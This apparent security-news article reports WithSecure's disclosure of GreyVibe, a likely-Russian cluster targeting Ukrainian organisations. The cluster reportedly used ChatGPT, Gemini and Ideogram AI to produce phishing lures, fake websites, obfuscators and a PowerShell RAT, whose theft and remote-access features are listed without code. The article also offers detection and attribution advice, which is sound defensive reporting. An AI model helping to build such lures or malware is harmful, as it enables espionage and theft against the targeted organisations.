GreyVibe Used ChatGPT, Gemini and Ideogram AI Across a Likely-Russian Ukraine Campaign

GreyVibe is not a story about one Russia-aligned cluster. It is the fourth documented case in 2026 — alongside Kimsuky's HelloDoor, Google's first AI-developed zero-day in the wild, and the Germany-China AI-superhacker warning — that AI-as-attacker-tooling has crossed from research paper to operational tradecraft.

KYIV, UKRAINE — On May 29, 2026, the Finnish security firm WithSecure disclosed a likely-Russian threat cluster it tracks as GreyVibe, which has been targeting Ukrainian and Ukraine-related organisations in the military, government, civilian and business sectors since at least August 2025. The standout characteristic, per WithSecure's research, is that GreyVibe has used generative AI tools — specifically ChatGPT, Google Gemini and Ideogram AI — across every phase of its operations, from fake-website and phishing-lure generation to the development of custom malware and post-compromise tooling.

WithSecure says the link to a Russian-speaking operator is supported by the language used in the malware control panels, comments inside the code artefacts, and a command-and-control server clock configured to UTC+3 (Moscow time). The researchers emphasise that the activity "appears to align with Russian state interests" but stop short of confidently classifying GreyVibe as a nation-state operation — a hedge that is itself a piece of the story.

What Happened

On May 29, 2026, WithSecure published research naming GreyVibe — a previously untracked threat cluster that has been operating against Ukrainian and Ukraine-related organisations since at least August 2025 and was discovered by WithSecure researchers in January 2026. The targeting set spans military, government, civilian and business organisations, and the campaign's defining trait, in WithSecure's framing, is the breadth of generative-AI tooling threaded through it. The researchers say ChatGPT, Google Gemini and Ideogram AI have been used to generate detailed and realistic phishing lures and fake-website content, and that the cluster's custom obfuscators — tracked by WithSecure as LOOKVALPS, LOOKVALJS, DAYLIGHT and TEASOUP — together with a PowerShell-based remote-access trojan named LegionRelay were likely developed with the assistance of large language models.

LegionRelay is the operational centrepiece of WithSecure's writeup. The PowerShell RAT supports file theft, screenshot capture, browser credential theft, the exfiltration of Telegram and WhatsApp data, and the configuration of remote-desktop access on infected hosts — the standard post-compromise feature set of a modern espionage tool, with the difference that WithSecure assesses the code itself to have been produced with LLM assistance. The attribution language attached to GreyVibe is deliberately careful: Russian-language strings inside the malware control panels, comments in the code artefacts, and a command-and-control server clock configured to UTC+3 (Moscow time) lead the researchers to a Russian-speaking operator and an alignment with Russian state interests, but not to a confident nation-state classification.

WithSecure's Framing: A Glimpse of How Future Groups Will Operate

The most quoted line in WithSecure's disclosure is the framing of GreyVibe as a preview rather than an outlier. The researchers describe the cluster as a glimpse into how future cybercriminal and state-aligned groups will operate — not because the targeting or the post-compromise capabilities are exotic, but because the entire production pipeline behind them has been industrialised with public AI tools. Lures that read as native and on-context, obfuscators built faster than a small team could write by hand, a PowerShell RAT whose feature set was assembled with LLM help: each individual piece is recognisable from past espionage operations, but the speed and finish that AI assistance gives to the whole bundle is what WithSecure says is new. GreyVibe is, in their account, a working version of the operating model that defenders should expect to see more of.

ChatGPT, Gemini and Ideogram AI Are Being Used, Not Compromised

An important framing point for readers: GreyVibe is using public AI tools as productivity tooling, not exploiting or compromising them. The campaign's authors are paying customers — or at minimum users — of OpenAI's ChatGPT, Google's Gemini and Ideogram AI's image-generation service, and they are using those services the same way a normal user would: to draft text faster, to generate images for fake websites, and, per WithSecure's analysis, to scaffold code for malware components. Neither OpenAI, Google nor Ideogram AI is the failure point in this story; the platforms have not been breached and there is no allegation that their safety controls were evaded in any architecturally novel way. The failure mode is at a different layer entirely: a sufficiently determined operator can route enough of an attack pipeline through general-purpose AI assistants that the marginal cost of producing high-quality lures and bespoke tooling falls dramatically, and there is currently no platform-level control that distinguishes that workflow from any other knowledge worker's.

GreyVibe Joins a Now-Documented Operational Cluster

GreyVibe is not the first AI-as-attacker-tooling case of 2026, and the more important framing is that it joins a documented operational cluster. The CyberSignal's earlier coverage of Kimsuky's PebbleDash variant with LLM-developed code comments in the HelloDoor malware established that a North Korea-aligned actor was already using LLMs to scaffold malware. Google GTIG's disclosure of the first AI-developed zero-day exploited in the wild for a 2FA bypass at mass scale moved the threshold further by showing AI being used to discover and weaponise a vulnerability, not just produce text. And Germany's BfV warning, drawn from China's Mythos and Glasswing programmes, that an AI-superhacker is on the near horizon is the strategic-intelligence version of the same finding. Read together with GreyVibe — and alongside the CyberSignal's same-day coverage of Kimsuky's HttpSpy backdoor against the South Korean military — at least four distinct actor profiles are now using generative AI as live operational tooling. The trend is multi-alignment and multi-actor, and it is no longer future-tense.

Scope and Impact

The immediate scope question — how many Ukrainian organisations have been touched by GreyVibe — is not in WithSecure's public disclosure, and this account does not invent one. What WithSecure does establish is the breadth of the targeting set across military, government, civilian and business sectors, and the duration of the operation, which has been running since at least August 2025. For Ukrainian and Ukraine-allied defenders, the relevant assumption is that any organisation with a plausible link to Ukrainian state interests is in the targeting universe, and that the activity has had nine months to develop before being publicly named.

The wider impact is the precedent GreyVibe sets for what an espionage-grade campaign now looks like when AI is part of the production pipeline. A Russia-aligned cluster — even one carrying the careful "likely Russian" hedge — using ChatGPT and Gemini for lures and Ideogram AI for fake-website imagery slots into the same year as ESET's October 2025 to March 2026 APT activity report cataloguing Sandworm, DyNoWiper and Lazarus operations and Microsoft's reporting on Kazuar / Secret Blizzard turning a Signal-Desktop foothold into a Russian nation-state botnet. The Russia-aligned espionage stack has not slowed; GreyVibe is its AI-enabled iteration.

What WithSecure deliberately does not say is also load-bearing. The researchers do not claim that GreyVibe is GRU, FSB or SVR, do not name a specific Russian service or unit, and explicitly note that they cannot confidently classify the cluster as a nation-state operation. The evidence — Russian-language panels and code comments, a UTC+3 C2 clock, alignment with Russian state interests in target selection — is consistent with a Russian-speaking operator and a state-aligned mission, but it is not, on its own, sufficient to graduate the cluster to a confident state attribution. That hedge should travel with every downstream description of GreyVibe; collapsing it into firm attribution would overstate what the evidence supports.

Response and Attribution

For SOC analysts at Ukrainian critical-infrastructure organisations and Ukraine-allied entities, brief the team on the specific telltales of LLM-generated phishing content as a triage heuristic: unnaturally clean phrasing in Ukrainian or Russian email lures, formulaic salutations, plausible-but-hallucinated context in the body, and overly well-structured copy that does not match the apparent sender's prior pattern. Hunt for the LegionRelay PowerShell RAT behaviours WithSecure documents — file theft, screenshot capture, browser-credential reads, Telegram and WhatsApp data exfiltration and RDP-setup activity — and treat any inbound Russia-aligned cluster activity as elevated through any active conflict window.

For CISOs more broadly, GreyVibe is the moment to update threat models to assume that AI-as-attacker-tooling is documented operational tradecraft across at least four actors this year — Kimsuky's HelloDoor, the Google AI-developed zero-day, the German Mythos and Glasswing warning, and now GreyVibe — and to pre-script an "LLM artefacts in malware analysis" workflow for the SOC. The hunting signals that workflow should formalise include emoji-laden or stylistically uniform code comments, hallucinated API references inside obfuscators or loaders, and unusually well-edited phishing copy that does not match a sender's prior cadence. None of these is conclusive on its own; together they are an increasingly reliable family of indicators.

For threat-hunting teams, the immediate operational task is to ingest any GreyVibe-named indicators of compromise WithSecure publishes — particularly anything tied to LOOKVALPS, LOOKVALJS, DAYLIGHT, TEASOUP and LegionRelay — and to write YARA and detection logic for each as it lands. On the attribution side, the honest posture is to preserve the "likely Russian" hedge in internal reporting and downstream briefings; the evidence supports a Russian-speaking, state-aligned operator and no more, and overstating that finding would make the rest of the threat picture harder to maintain.

The CyberSignal Analysis

Signal 01 — AI-as-Attacker-Tooling Is Now an Operational Cluster, Not a Single-Actor Story

The mistake to avoid with GreyVibe is treating it as one cluster's story. By May 29, 2026, the AI-as-attacker-tooling pattern has at least four documented profiles attached to it: Kimsuky's HelloDoor with LLM-written code comments, Google GTIG's first AI-developed zero-day exploited in the wild, the German intelligence warning drawn from China's Mythos and Glasswing programmes, and now WithSecure's GreyVibe disclosure. Each comes from a different alignment — North Korea, an unnamed researcher-grade actor, China and likely Russia — and each touches a different part of the attack chain, from malware code to vulnerability discovery to lure production. Read together, they describe a trend that is multi-actor, multi-alignment and multi-stage. The implication for defender programmes is that AI-tooled tradecraft is no longer something to plan for; it is something to detect for, today.

Signal 02 — Preserve the "Likely Russian" Hedge — It Is Doing Real Work

WithSecure's careful attribution language is the most underrated detail in the GreyVibe disclosure. The researchers say the activity "appears to align with Russian state interests" and that the language artefacts, code comments and UTC+3 C2 clock point to a Russian-speaking operator — but they explicitly do not classify the cluster as a confirmed nation-state operation. That hedge is not a hedge for its own sake. It is a statement that the evidence supports a Russian-speaking, state-aligned actor and stops short of supporting a specific service identification. Downstream coverage that quietly upgrades "likely Russian" to "Russian state-sponsored" or names a service GreyVibe is not, strictly, evidenced to be is the kind of drift that erodes the broader Russia-attribution picture over time. The discipline GreyVibe asks of its readers is to keep the hedge in place even when it is rhetorically tempting to drop it.

Signal 03 — The Failure Mode Is the Workflow, Not the AI Platform

The framing trap with GreyVibe is to read it as a story about ChatGPT, Gemini and Ideogram AI failing. They have not. The platforms have not been compromised, their guardrails have not been architecturally bypassed in a way the disclosure surfaces, and there is no allegation that any of the three vendors enabled this campaign. What GreyVibe shows is that a sufficiently motivated operator can route enough of an attack pipeline through general-purpose AI assistants — lure drafting, image generation for fake websites, code scaffolding for obfuscators and a PowerShell RAT — that the marginal cost of producing a polished espionage operation against Ukraine falls dramatically. The failure mode lives at the workflow layer, and there is currently no platform-level control that distinguishes "writing a polished phishing email in Ukrainian" from "writing a polished customer-success email in Ukrainian." That, more than any one cluster's tradecraft, is the structural problem GreyVibe makes visible.

Sources